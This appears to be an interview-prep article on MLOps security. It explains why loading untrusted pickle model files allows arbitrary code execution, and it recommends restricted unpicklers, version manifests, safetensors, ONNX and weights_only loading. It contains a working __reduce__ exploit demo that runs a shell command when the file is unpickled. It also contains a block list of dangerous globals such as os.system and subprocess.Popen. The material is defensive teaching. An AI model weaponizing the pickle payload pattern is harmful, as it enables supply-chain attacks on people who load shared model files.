MLOps · Medium · Asked at Amazon, Google, Hugging Face

What are the security and compatibility risks of using pickle for model serialization, and what are the safer alternatives?

For: MLOps Engineer, ML Engineer, AI / LLM Engineer

The short answer

Unpickling can import and call arbitrary Python callables, so loading an untrusted pickle file is equivalent to running untrusted code on your machine. Beyond security, pickle artifacts are tightly coupled to the class definitions, and in practice the library versions, that produced them, which makes them fragile across environments.

How to think about it

Python’s pickle module, used directly or through joblib, is the de facto default for persisting scikit-learn models, and PyTorch’s torch.save uses it under the hood. Its convenience hides two fundamental problems.

Security: arbitrary code execution

Pickle works by storing a stream of opcodes for a small stack-based virtual machine, which is replayed on load. Those opcodes can import any callable and invoke it with attacker-chosen arguments. A malicious actor can therefore craft a pickle file that calls os.system, exfiltrates secrets, or installs a backdoor, all triggered by a single joblib.load("model.pkl"). This is not a theoretical risk; it has been demonstrated repeatedly in ML supply chain attacks.

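# Demonstration of the risk. NEVER load untrusted pickles.
import os
import pickle

class Exploit:
    # __reduce__ tells pickle how to rebuild the object: here, "call os.system(...)"
    def __reduce__(self):
        # Harmless stand-in; a real attacker would download and run a remote script
        return (os.system, ("echo 'code executed during unpickling'",))

payload = pickle.dumps(Exploit())
pickle.loads(payload)   # runs the shell command as a side effect of loading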
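
When a pickle has to be read anyway, the standard library lets you override `Unpickler.find_class` so that only allowlisted globals can be resolved. The sketch below follows that pattern; the names `SAFE_BUILTINS`, `RestrictedUnpickler`, and `restricted_loads` are illustrative, and the allowlist is an assumption you would adapt to your own data. Treat it as a mitigation rather than a sandbox.

```python
import builtins
import io
import pickle

# Hypothetical allowlist: the only globals a pickle is permitted to reference.
SAFE_BUILTINS = {"range", "complex", "set", "frozenset", "slice"}


class RestrictedUnpickler(pickle.Unpickler):
    def find_class(self, module, name):
        # Called whenever the pickle stream asks to import a global.
        if module == "builtins" and name in SAFE_BUILTINS:
            return getattr(builtins, name)
        # Everything else (os.system, subprocess.Popen, ...) is refused.
        raise pickle.UnpicklingError(f"global '{module}.{name}' is forbidden")


def restricted_loads(data: bytes):
    """Like pickle.loads, but only allowlisted globals can be resolved."""
    return RestrictedUnpickler(io.BytesIO(data)).load()
```

With this in place, plain containers and numbers still load, while the `Exploit` payload above fails with `pickle.UnpicklingError` before `os.system` is ever looked up.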

Compatibility: brittle across versions

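A pickle stores references to classes by import path, not the class code itself, so it only loads correctly if the environment still defines those classes the same way. A model pickled with sklearn 1.3 may fail to load, or load and behave incorrectly, with sklearn 1.5 because internal class paths or attribute names changed; scikit-learn does not support loading models across versions. The pickle format itself is less of a problem across Python versions: newer interpreters can read older protocols, although the reverse does not hold (protocol 5 requires Python 3.8+). In practice, a pickle created on Python 3.10 usually fails on Python 3.12 because the libraries it depends on were upgraded along with the interpreter.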
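
One way to make version drift visible is to store a small manifest next to the artifact and compare it at load time. This is a minimal sketch using only the standard library; `build_manifest` and `check_manifest` are hypothetical helper names, and the exact-match policy is an assumption (you may prefer to compare only major and minor versions).

```python
import json
import platform
from importlib import metadata


def build_manifest(packages):
    """Record the Python version and installed versions of the given packages."""
    versions = {}
    for name in packages:
        try:
            versions[name] = metadata.version(name)
        except metadata.PackageNotFoundError:
            versions[name] = None  # package is not installed in this environment
    return {"python": platform.python_version(), "packages": versions}


def check_manifest(manifest):
    """Return human-readable mismatches between a saved manifest and this environment."""
    current = build_manifest(manifest["packages"].keys())
    problems = []
    if current["python"] != manifest["python"]:
        problems.append(
            f"python: saved {manifest['python']}, running {current['python']}"
        )
    for name, saved in manifest["packages"].items():
        now = current["packages"][name]
        if now != saved:
            problems.append(f"{name}: saved {saved}, running {now}")
    return problems
```

At save time you might write `json.dump(build_manifest(["scikit-learn", "numpy"]), f)` alongside the model file, then refuse to load (or log a warning) when `check_manifest` returns a non-empty list.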

Safer alternatives by use case:

Use case	Format	Tool
Cross-framework inference	ONNX	`torch.onnx.export`, `tf2onnx`
Tree models (XGBoost, LightGBM)	Native JSON/binary	`model.save_model("model.json")`
PyTorch weights only	`state_dict` + JSON config	`torch.save(model.state_dict(), ...)`
Scikit-learn pipelines	skops	`skops.io.dump`
Hugging Face models	safetensors	`model.save_pretrained(...)`
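
The formats in this table share one property: the file contains only data (tensors, tree structures, parameters), and the code that interprets it lives in your own trusted environment. The sketch below illustrates that principle with a deliberately tiny, hypothetical `LinearModel` stored as JSON; it is not the API of any library in the table, and the `format_version` field is an assumed convention.

```python
import json
from dataclasses import asdict, dataclass


@dataclass
class LinearModel:
    """Toy model used only for illustration."""
    weights: list
    bias: float

    def predict(self, x):
        return sum(w * xi for w, xi in zip(self.weights, x)) + self.bias


def save_model(model, path):
    # The file holds plain numbers plus a schema version, nothing executable.
    with open(path, "w") as f:
        json.dump({"format_version": 1, "params": asdict(model)}, f)


def load_model(path):
    with open(path) as f:
        doc = json.load(f)
    if doc.get("format_version") != 1:
        raise ValueError(f"unsupported format_version: {doc.get('format_version')}")
    params = doc["params"]
    # Validate and coerce the data explicitly instead of trusting the file.
    return LinearModel(
        weights=[float(w) for w in params["weights"]],
        bias=float(params["bias"]),
    )
```

A tampered file can at worst produce wrong numbers or a parse error; it cannot make the loader run code, and the explicit schema version gives you a place to handle format changes deliberately.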

# Safer: save the PyTorch state dict plus a separate JSON config
import json
import torch

# `model`, `model_config`, and `MyModel` come from your own training code
torch.save(model.state_dict(), "weights.pt")
with open("config.json", "w") as f:
    json.dump(model_config, f)

# Load: reconstruct the architecture first, then load the weights
with open("config.json") as f:
    model = MyModel(**json.load(f))
model.load_state_dict(torch.load("weights.pt", weights_only=True))

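The weights_only=True flag (available since PyTorch 1.13 and the default since PyTorch 2.6) restricts the unpickler to tensors, primitive types, and an allowlist of known-safe classes, which blocks the arbitrary-callable path that code execution relies on.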
